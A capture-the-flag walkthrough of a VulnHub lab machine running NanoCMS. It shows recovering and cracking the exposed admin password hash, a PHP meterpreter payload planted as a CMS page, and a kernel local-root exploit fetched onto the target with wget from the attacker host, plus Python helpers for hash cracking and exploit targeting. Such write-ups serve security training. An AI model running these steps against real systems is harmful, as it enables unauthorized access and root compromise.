In this article we will solve one more CTF challenge. The machine can be downloaded from VulnHub and is designed for beginners.
The first step is to find the IP address of the target machine. For that we used the command: netdiscover -i wlan0 (use whichever interface is on the same network as the target).
The next step is to check for open ports, and for that we ran a full TCP port scan: nmap -p- 192.168.43.201 (a follow-up service scan with -sV against the open ports tells you what is actually listening on each of them).
We can see this machine has many open ports, but we decided to start with the HTTP service on port 80. Opening http://192.168.43.201:80 in the browser shows the website of a fake organization.
Exploring the website, we found a login page under Blog -> Admin Login.
We looked for vulnerabilities in the login form but found none, and the page source contained no information that could be used to log in either.
After some thought we noticed the name NanoCMS on the page. A quick search showed that NanoCMS has a publicly known weakness: the data file in which it stores its configuration, including the admin password hash, sits under the web root and is served to anyone who requests it.
So we opened that file as described in the write-up we found, by visiting http://192.168.43.201/~andy/data/pagesdata.txt, which exposes the admin password hash.
Now it is time to crack the hash. We used https://crackstation.net/ for this. Note that submitting a hash to a third-party site discloses it; on a real engagement, crack it offline with hashcat or john instead.
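The offline version of this step, as an added example that is not part of the original write-up: pull the hash out of a NanoCMS-style pagesdata.txt (a PHP-serialized array) and try it against a wordlist. The serialized sample, the wordlist and the assumption that the stored hash is unsalted MD5 (32 hex characters, as seen in the file) are constructed for this example; the real target's hash is not reproduced here.

```python
"""Extract the admin password hash from a NanoCMS-style pagesdata.txt and crack it offline."""
import hashlib
import re
from typing import Dict, Iterable, Optional

# Constructed sample in the PHP-serialized layout NanoCMS uses for pagesdata.txt.
# The hash is generated from the known password so the example is self-checking;
# it is NOT the hash from the target machine.
KNOWN_PASSWORD = "shannon"
SAMPLE_PAGESDATA = (
    'a:3:{s:8:"username";s:5:"admin";'
    's:8:"password";s:32:"%s";'
    's:5:"pages";a:1:{s:4:"home";a:1:{s:5:"title";s:4:"Home";}}}'
) % hashlib.md5(KNOWN_PASSWORD.encode()).hexdigest()

# Constructed mini wordlist; in practice point this at rockyou.txt, or hand the hash to
# hashcat -m 0 / john --format=raw-md5 and let them do the work.
WORDLIST = ["password", "admin", "letmein", "shannon", "andy"]

# Matches a serialized key followed by a 32-hex-character string value (an unsalted MD5).
HASH_RE = re.compile(r's:\d+:"(\w+)";s:32:"([0-9a-fA-F]{32})"')


def extract_hashes(pagesdata: str) -> Dict[str, str]:
    """Return {field_name: md5_hex} for every 32-hex string value in the serialized blob."""
    return {m.group(1): m.group(2).lower() for m in HASH_RE.finditer(pagesdata)}


def crack_md5(target_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the candidate whose unsalted MD5 equals target_hash, or None if none matches."""
    target = target_hash.lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


def recover_admin_password(pagesdata: str, wordlist: Iterable[str]) -> Optional[str]:
    """End-to-end: parse the file, find the 'password' field, crack it."""
    hashes = extract_hashes(pagesdata)
    if "password" not in hashes:
        return None
    return crack_md5(hashes["password"], wordlist)


if __name__ == "__main__":
    print(recover_admin_password(SAMPLE_PAGESDATA, WORDLIST))
```

The regex approach is deliberate: a full PHP unserialize() port is not needed to pull one field, and keying on the `s:32:` length prefix also tells you at a glance that the stored value is an MD5 and not something salted.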
Now we have the admin login credentials:
username : admin
password : shannon
With these credentials we can log in to the admin panel of the website.
Here we can see that the admin can add a New Page. We first checked Pages & Options for information about the existing pages, hoping to find a .php file we could reuse to get a meterpreter session. There was none, but we still tried adding a new page: we generated a malicious PHP payload (shown in the image), copied it, and pasted it into the content field of the new page. The page content is executed as PHP when the page is served, which is what makes this work.
Then we clicked Add Page. Before triggering the payload we started the Metasploit handler on Kali (multi/handler, with the same payload, LHOST and LPORT used in the PHP code), then logged out and browsed to http://192.168.43.201/~andy/.
Clicking the new page, clickme, executes the code.
We now have a meterpreter session, as shown in the image. Typing shell drops us into a basic shell, and the usual python pty one-liner (spawning /bin/bash through the pty module) turns it into a stable, fully interactive shell.
Running uname -r shows an old kernel version, so there is a good chance a public exploit exists for it. Searching, we found one on Exploit-DB: https://www.exploit-db.com/exploits/9479 (one of the sock_sendpage() local root exploits for CVE-2009-2692). Kernel exploits can crash the target, so on a real engagement confirm the exact kernel version and distribution against the exploit's header comment before running it.
We downloaded the exploit to our Kali machine and compiled it as a 32-bit binary with: gcc -m32 9479.c -o roothis (the -m32 flag needs the multilib packages installed, and should match the target's architecture as reported by uname -m). To transfer the binary we served it from the directory containing it with Python's built-in web server: python -m SimpleHTTPServer (Python 2; the Python 3 equivalent is the http.server module).
Switching to the target's shell, we downloaded the binary with: wget http://192.168.43.9:8000/roothis (192.168.43.9 is our Kali machine; SimpleHTTPServer listens on port 8000 by default).
We made the binary executable with chmod +x roothis and ran it with ./roothis. Booooooooooom! We are root, which we confirmed by running id.
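Two checks worth scripting before the compile-transfer-run sequence above, as an added example that is not part of the original write-up: does the target's uname -r fall inside the kernel range the exploit claims to cover, and which gcc flag matches the target's uname -m. The affected ranges are assumed from the public advisory wording for CVE-2009-2692 ("2.6.0 through 2.6.30.4 and 2.4.4 through 2.4.37.4") and the uname outputs are constructed; the exploit_plan helper, the ARCH_FLAGS table and the output file name roothis are mine, not the exploit author's.

```python
"""Sanity checks before compiling and running a kernel local-root exploit against a target."""
import re
from typing import Optional, Tuple

# Assumed affected ranges for CVE-2009-2692 (sock_sendpage NULL-pointer dereference), taken
# from the advisory wording. Always confirm against the header comment of the exploit source
# you actually downloaded; distributions also backport fixes without bumping the version.
VULNERABLE_RANGES = [
    ((2, 4, 4), (2, 4, 37, 4)),
    ((2, 6, 0), (2, 6, 30, 4)),
]

# Assumed mapping from `uname -m` output to the gcc flag that produces a matching binary
# (x86 only; anything else needs a cross-compiler and is reported as unsupported).
ARCH_FLAGS = {"i386": "-m32", "i486": "-m32", "i586": "-m32", "i686": "-m32", "x86_64": "-m64"}


def parse_kernel_version(uname_r: str) -> Tuple[int, ...]:
    """'2.6.22-14-server' -> (2, 6, 22). Pre-release (-rcN) and distro suffixes are ignored."""
    m = re.match(r"(\d+(?:\.\d+)*)", uname_r.strip())
    if not m:
        raise ValueError(f"unrecognised kernel version string: {uname_r!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def _padded(version: Tuple[int, ...], width: int = 4) -> Tuple[int, ...]:
    """Right-pad with zeros so (2, 6, 30) compares as 2.6.30.0 against 2.6.30.4."""
    return tuple(version) + (0,) * (width - len(version))


def in_vulnerable_range(uname_r: str) -> bool:
    """True if the numeric kernel version lies inside one of the advisory's affected ranges."""
    v = _padded(parse_kernel_version(uname_r))
    return any(_padded(lo) <= v <= _padded(hi) for lo, hi in VULNERABLE_RANGES)


def gcc_arch_flag(uname_m: str) -> Optional[str]:
    """gcc flag to use on the attacker box so the binary runs on the target's architecture."""
    return ARCH_FLAGS.get(uname_m.strip())


def exploit_plan(uname_r: str, uname_m: str) -> str:
    """Summarise whether compiling the exploit is worth trying and, if so, with which flag."""
    if not in_vulnerable_range(uname_r):
        return f"skip: kernel {uname_r} is outside the affected range"
    flag = gcc_arch_flag(uname_m)
    if flag is None:
        return f"manual: kernel {uname_r} looks affected but arch {uname_m} needs a cross-compiler"
    return f"compile: gcc {flag} 9479.c -o roothis (kernel {uname_r}, arch {uname_m})"


if __name__ == "__main__":
    # Constructed uname -r / uname -m pairs, not captured from the target.
    for r, m in [("2.6.22-14-server", "i686"), ("2.6.32-21-generic", "x86_64"), ("2.6.30.4", "armv7l")]:
        print(exploit_plan(r, m))
```

A version inside the range only means "unpatched upstream": a distribution may have backported the fix under the same version string, and on this bug the target's vm.mmap_min_addr setting also decides whether page zero can be mapped at all, so treat a "compile" verdict as a reason to try, not a guarantee.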
And this completes the challenge!